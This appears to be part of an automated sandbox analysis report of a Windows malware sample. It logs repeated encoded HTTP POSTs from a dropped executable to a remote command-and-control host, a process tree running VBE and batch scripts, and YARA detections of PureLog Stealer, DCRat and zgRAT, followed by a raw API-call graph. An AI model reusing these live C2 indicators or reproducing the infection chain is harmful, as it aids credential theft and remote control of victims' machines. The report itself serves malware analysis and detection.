                                        Data Ascii: [_C\YUZ]^^TUV[ZQ_ZY_RZRYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@'"+0=%Y3T+8$>68Z$[>6W$?:X'-3_0*&G!']*#
                                        Nov 5, 2024 08:14:20.973078966 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:21.052623987 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:19 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        143 | 192.168.2.7 | 50114 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:21.180857897 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:21.536540985 CET1032OUTData Raw: 5b 59 43 5e 59 55 5a 57 5e 5e 54 55 56 52 5a 5e 5f 5b 59 5b 52 51 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: [YC^YUZW^^TUVRZ^_[Y[RQRPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.@38[$[2'2;,(?)%3','X*=',"Y3.#08(>:&G!']*
                                        Nov 5, 2024 08:14:22.000458002 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:22.078519106 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:20 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        144 | 192.168.2.7 | 50115 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:22.215579987 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:22.569195032 CET1032OUTData Raw: 5b 5d 43 59 59 54 5a 5c 5e 5e 54 55 56 58 5a 5a 5f 56 59 5c 52 58 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: []CYYTZ\^^TUVXZZ_VY\RXRQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-'?'=024^/8>6$^3+*-2Q3Z-3.<$#[>&G!']*/
                                        Nov 5, 2024 08:14:23.027071953 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:23.108422995 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:21 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        145 | 192.168.2.7 | 50116 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:23.243865967 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:23.599149942 CET1032OUTData Raw: 5e 58 43 5c 59 59 5a 54 5e 5e 54 55 56 53 5a 50 5f 50 59 5d 52 5d 52 59 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^XC\YYZT^^TUVSZP_PY]R]RYYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.G'"$^0-)$"\-(<[)%+3'(>"'*_$8'+7X+:&G!']*


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        146 | 192.168.2.7 | 50117 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:23.871534109 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1300
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:24.224044085 CET1300OUTData Raw: 5e 5e 43 53 59 5b 5f 56 5e 5e 54 55 56 53 5a 5d 5f 50 59 5a 52 5f 52 50 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^^CSY[_V^^TUVSZ]_PYZR_RPYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$2;%-=]$2$_/,)%73<4).6W'60>+%(?[=&G!']*
                                        Nov 5, 2024 08:14:24.692739010 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:24.772321939 CET | 308 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 152
                                        Connection: keep-alive
                                        Data Raw: 0d 15 39 58 33 38 01 0e 37 2a 2d 0f 3c 58 3c 5c 23 24 38 05 2e 2d 34 5c 30 30 20 1e 29 3f 0c 18 23 17 39 02 21 13 27 04 20 2e 27 1e 3d 0b 2f 5a 07 10 25 13 25 0c 20 0e 31 3e 05 06 33 0d 0d 5e 28 3f 28 5d 21 2b 0d 5c 26 05 31 1c 24 2a 05 53 38 07 3e 0e 39 38 0a 04 2e 0f 24 11 24 34 2c 54 0d 10 39 18 3e 31 38 55 3e 12 35 17 25 27 28 10 37 2d 3c 07 2a 3a 02 1b 3c 03 22 14 24 1e 1d 0f 20 32 2d 57 24 3b 38 5d 33 1f 2c 52 31 22 25 55 2c 03 2e 56 0f 30 57 51
                                        Data Ascii: 9X387*-<X<\#$8.-4\00 )?#9!' .'=/Z%% 1>3^(?(]!+\&1$*S8>98.$$4,T9>18U>5%'(7-<*:<"$ 2-W$;8]3,R1"%U,.V0WQ


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        147 | 192.168.2.7 | 50118 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:24.006117105 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:24.364764929 CET1032OUTData Raw: 5e 5d 43 59 5c 58 5f 57 5e 5e 54 55 56 5f 5a 50 5f 54 59 5f 52 5f 52 51 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^]CY\X_W^^TUV_ZP_TY_R_RQYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[-$2$:'T8[/>%0(*>'"X037[=:&G!']*3
                                        Nov 5, 2024 08:14:24.828008890 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:25.105005026 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V
                                        Nov 5, 2024 08:14:25.105074883 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:22 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        148 | 192.168.2.7 | 50119 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:25.229348898 CET | 287 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Nov 5, 2024 08:14:25.583385944 CET1032OUTData Raw: 5e 59 46 58 5c 5e 5a 5c 5e 5e 54 55 56 53 5a 59 5f 51 59 5f 52 5b 52 5a 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^YFX\^Z\^^TUVSZY_QY_R[RZYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.$!/3["'<\8;<^>5+$<?>>T$<"0='8<*:&G!']*
                                        Nov 5, 2024 08:14:26.041879892 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:26.121721983 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:24 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                        149 | 192.168.2.7 | 50120 | 37.44.238.250 | 80 | 7392 | C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        Nov 5, 2024 08:14:26.247023106 CET | 311 | OUT | POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                        Host: 427176cm.nyashkoon.in
                                        Content-Length: 1032
                                        Expect: 100-continue
                                        Connection: Keep-Alive
                                        Nov 5, 2024 08:14:26.602152109 CET1032OUTData Raw: 5e 5a 43 5a 5c 5d 5a 5d 5e 5e 54 55 56 5c 5a 5f 5f 56 59 58 52 5f 52 58 59 52 5e 5f 57 5e 58 59 5d 58 55 58 5a 58 52 5a 5e 5f 55 51 57 57 50 5f 54 58 5f 59 5d 57 55 53 5b 5f 52 5f 5c 56 59 57 51 59 42 5e 5f 5a 59 5e 5b 5a 43 5e 58 5b 58 50 52 58
                                        Data Ascii: ^ZCZ\]Z]^^TUV\Z__VYXR_RXYR^_W^XY]XUXZXRZ^_UQWWP_TX_Y]WUS[_R_\VYWQYB^_ZY^[ZC^X[XPRX^UV]PZVTV\]USQ[_CRT]^_T]CT[QBR^Q\[C[ZTS[X]YVBW\T[^XV[]\VV[XB_SS[W[Z^T\]\\YQ_[^^YXX[W^R]XQXT_U[[Y^W^UT[.0/093+8;0Z=$0/;=-003^';?)&G!']*?
                                        Nov 5, 2024 08:14:27.084187984 CET | 25 | IN | HTTP/1.1 100 Continue
                                        Nov 5, 2024 08:14:27.170645952 CET | 158 | IN | HTTP/1.1 200 OK
                                        Server: nginx
                                        Date: Tue, 05 Nov 2024 07:14:25 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 4
                                        Connection: keep-alive
                                        Data Raw: 3f 5d 40 56
                                        Data Ascii: ?]@V


                                        Target ID:0
                                        Start time:02:11:56
                                        Start date:05/11/2024
                                        Path:C:\Users\user\Desktop\HcEvQKWAu2.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\HcEvQKWAu2.exe"
                                        Imagebase:0xf80000
                                        File size:1'962'809 bytes
                                        MD5 hash:3A92479AA98E55499BFA33BC2EA35B64
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1221219115.0000000006F81000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1221537345.0000000004F2B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.1220726109.0000000006680000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:02:11:57
                                        Start date:05/11/2024
                                        Path:C:\Windows\SysWOW64\wscript.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WScript.exe" "C:\ComponentSavesinto\Rvb4MehGYPWwP7mOC7L2KZoGBB7qbkXbVDhXcse7w1B6.vbe"
                                        Imagebase:0xf70000
                                        File size:147'456 bytes
                                        MD5 hash:FF00E0480075B095948000BDC66E81F0
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:02:12:06
                                        Start date:05/11/2024
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\system32\cmd.exe /c ""C:\ComponentSavesinto\ZNtisV5JM91TmuX3tDFXvJx7ah2q8kJOB5hVZXHXTCGj5p.bat" "
                                        Imagebase:0x410000
                                        File size:236'544 bytes
                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:10
                                        Start time:02:12:06
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff75da10000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:11
                                        Start time:02:12:06
                                        Start date:05/11/2024
                                        Path:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\ComponentSavesinto/fontReviewsavesinto.exe"
                                        Imagebase:0x610000
                                        File size:1'640'960 bytes
                                        MD5 hash:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000000.1319319511.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 0000000B.00000002.1337505438.0000000002C0A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Author: Joe Security
                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ComponentSavesinto\fontReviewsavesinto.exe, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 88%, ReversingLabs
                                        Reputation:low
                                        Has exited:true

                                        Target ID:12
                                        Start time:02:12:08
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0ZVhIKmod.bat"
                                        Imagebase:0x7ff6687f0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:13
                                        Start time:02:12:08
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff75da10000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:02:12:08
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\chcp.com
                                        Wow64 process (32bit):false
                                        Commandline:chcp 65001
                                        Imagebase:0x7ff7b6d70000
                                        File size:14'848 bytes
                                        MD5 hash:33395C4732A49065EA72590B14B64F32
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:15
                                        Start time:02:12:08
                                        Start date:05/11/2024
                                        Path:C:\Windows\System32\w32tm.exe
                                        Wow64 process (32bit):false
                                        Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                        Imagebase:0x7ff796c00000
                                        File size:108'032 bytes
                                        MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:17
                                        Start time:02:12:15
                                        Start date:05/11/2024
                                        Path:C:\ComponentSavesinto\fontReviewsavesinto.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\ComponentSavesinto\fontReviewsavesinto.exe"
                                        Imagebase:0xf60000
                                        File size:1'640'960 bytes
                                        MD5 hash:5B7391CD38F6218CD0E5C8F3899AB4DD
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3686700129.0000000003406000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000011.00000002.3686700129.000000000370A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:false

                                          Execution Graph

                                          Execution Coverage:9.5%
                                          Dynamic/Decrypted Code Coverage:0%
                                          Signature Coverage:9.4%
                                          Total number of Nodes:1507
                                          Total number of Limit Nodes:42
TranslateMessage DispatchMessageW 24644->24646 24645->24643 24645->24646 24646->24643 24647 f813e1 84 API calls 2 library calls 25400 f994e0 GetClientRect 25401 f9f2e0 46 API calls __RTC_Initialize 25450 f921e0 26 API calls std::bad_exception::bad_exception 25402 fabee0 GetCommandLineA GetCommandLineW 24649 f9eae7 24650 f9eaf1 24649->24650 24651 f9e85d ___delayLoadHelper2@8 14 API calls 24650->24651 24652 f9eafe 24651->24652 25403 f9f4e7 29 API calls _abort 25404 fa0ada 51 API calls 2 library calls 24716 f9e1d1 14 API calls ___delayLoadHelper2@8 25405 f9f4d3 20 API calls 25452 faa3d0 21 API calls 2 library calls 25453 fb2bd0 VariantClear 24720 f810d5 24725 f85abd 24720->24725 24726 f85ac7 __EH_prolog 24725->24726 24727 f8b505 84 API calls 24726->24727 24728 f85ad3 24727->24728 24732 f85cac GetCurrentProcess GetProcessAffinityMask 24728->24732 24733 f9e2d7 24734 f9e1db 24733->24734 24735 f9e85d ___delayLoadHelper2@8 14 API calls 24734->24735 24735->24734 25408 f962ca 123 API calls __InternalCxxFrameHandler 25456 f9b5c0 100 API calls 25457 f977c0 118 API calls 25458 f9ffc0 RaiseException _com_raise_error _com_error::_com_error 24742 f9dec2 24743 f9decf 24742->24743 24744 f8e617 53 API calls 24743->24744 24745 f9dedc 24744->24745 24746 f84092 _swprintf 51 API calls 24745->24746 24747 f9def1 SetDlgItemTextW 24746->24747 24748 f9b568 5 API calls 24747->24748 24749 f9df0e 24748->24749 25459 fab1b8 27 API calls 3 library calls 25460 f91bbd GetCPInfo IsDBCSLeadByte 24756 f9e5b1 24757 f9e578 24756->24757 24757->24756 24758 f9e85d ___delayLoadHelper2@8 14 API calls 24757->24758 24758->24757 25461 f9b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24886 f9f3b2 24887 f9f3be __FrameHandler3::FrameUnwindToState 24886->24887 24918 f9eed7 24887->24918 24889 f9f3c5 24890 f9f518 24889->24890 24893 f9f3ef 24889->24893 24991 f9f838 4 API calls 2 library calls 24890->24991 24892 f9f51f 24984 fa7f58 24892->24984 24901 f9f42e ___scrt_is_nonwritable_in_current_image 
___scrt_release_startup_lock 24893->24901 24929 fa8aed 24893->24929 24900 f9f40e 24903 f9f48f 24901->24903 24987 fa7af4 38 API calls 2 library calls 24901->24987 24937 f9f953 GetStartupInfoW __cftof 24903->24937 24905 f9f495 24938 fa8a3e 51 API calls 24905->24938 24908 f9f49d 24939 f9df1e 24908->24939 24912 f9f4b1 24912->24892 24913 f9f4b5 24912->24913 24914 f9f4be 24913->24914 24989 fa7efb 28 API calls _abort 24913->24989 24990 f9f048 12 API calls ___scrt_uninitialize_crt 24914->24990 24917 f9f4c6 24917->24900 24919 f9eee0 24918->24919 24993 f9f654 IsProcessorFeaturePresent 24919->24993 24921 f9eeec 24994 fa2a5e 24921->24994 24923 f9eef1 24928 f9eef5 24923->24928 25002 fa8977 24923->25002 24925 f9ef0c 24925->24889 24928->24889 24930 fa8b04 24929->24930 24931 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24930->24931 24932 f9f408 24931->24932 24932->24900 24933 fa8a91 24932->24933 24934 fa8ac0 24933->24934 24935 f9fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24934->24935 24936 fa8ae9 24935->24936 24936->24901 24937->24905 24938->24908 25095 f90863 24939->25095 24943 f9df3d 25144 f9ac16 24943->25144 24945 f9df46 __cftof 24946 f9df59 GetCommandLineW 24945->24946 24947 f9df68 24946->24947 24948 f9dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24946->24948 25148 f9c5c4 24947->25148 24949 f84092 _swprintf 51 API calls 24948->24949 24952 f9e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24949->24952 25159 f9b6dd LoadBitmapW 24952->25159 24953 f9dfe0 25153 f9dbde 24953->25153 24954 f9df76 OpenFileMappingW 24957 f9df8f MapViewOfFile 24954->24957 24958 f9dfd6 CloseHandle 24954->24958 24961 f9dfcd UnmapViewOfFile 24957->24961 24962 f9dfa0 __InternalCxxFrameHandler 24957->24962 24958->24948 24961->24958 24966 f9dbde 2 API calls 24962->24966 24968 f9dfbc 24966->24968 24967 f990b7 8 API calls 24969 f9e0aa DialogBoxParamW 24967->24969 24968->24961 24970 f9e0e4 24969->24970 24971 f9e0fd 24970->24971 
24972 f9e0f6 Sleep 24970->24972 24975 f9e10b 24971->24975 25189 f9ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 24971->25189 24972->24971 24974 f9e12a DeleteObject 24976 f9e13f DeleteObject 24974->24976 24977 f9e146 24974->24977 24975->24974 24976->24977 24978 f9e177 24977->24978 24982 f9e189 24977->24982 25190 f9dc3b 6 API calls 24978->25190 24981 f9e17d CloseHandle 24981->24982 25186 f9ac7c 24982->25186 24983 f9e1c3 24988 f9f993 GetModuleHandleW 24983->24988 25322 fa7cd5 24984->25322 24987->24903 24988->24912 24989->24914 24990->24917 24991->24892 24993->24921 25006 fa3b07 24994->25006 24997 fa2a67 24997->24923 24999 fa2a6f 25000 fa2a7a 24999->25000 25020 fa3b43 DeleteCriticalSection 24999->25020 25000->24923 25049 fac05a 25002->25049 25005 fa2a7d 7 API calls 2 library calls 25005->24928 25007 fa3b10 25006->25007 25009 fa3b39 25007->25009 25010 fa2a63 25007->25010 25021 fa3d46 25007->25021 25026 fa3b43 DeleteCriticalSection 25009->25026 25010->24997 25012 fa2b8c 25010->25012 25042 fa3c57 25012->25042 25015 fa2ba1 25015->24999 25017 fa2baf 25018 fa2bbc 25017->25018 25048 fa2bbf 6 API calls ___vcrt_FlsFree 25017->25048 25018->24999 25020->24997 25027 fa3c0d 25021->25027 25024 fa3d7e InitializeCriticalSectionAndSpinCount 25025 fa3d69 25024->25025 25025->25007 25026->25010 25028 fa3c4f 25027->25028 25029 fa3c26 25027->25029 25028->25024 25028->25025 25029->25028 25034 fa3b72 25029->25034 25032 fa3c3b GetProcAddress 25032->25028 25033 fa3c49 25032->25033 25033->25028 25036 fa3b7e ___vcrt_FlsFree 25034->25036 25035 fa3bf3 25035->25028 25035->25032 25036->25035 25037 fa3b95 LoadLibraryExW 25036->25037 25041 fa3bd5 LoadLibraryExW 25036->25041 25038 fa3bfa 25037->25038 25039 fa3bb3 GetLastError 25037->25039 25038->25035 25040 fa3c02 FreeLibrary 25038->25040 25039->25036 25040->25035 25041->25036 25041->25038 25043 fa3c0d 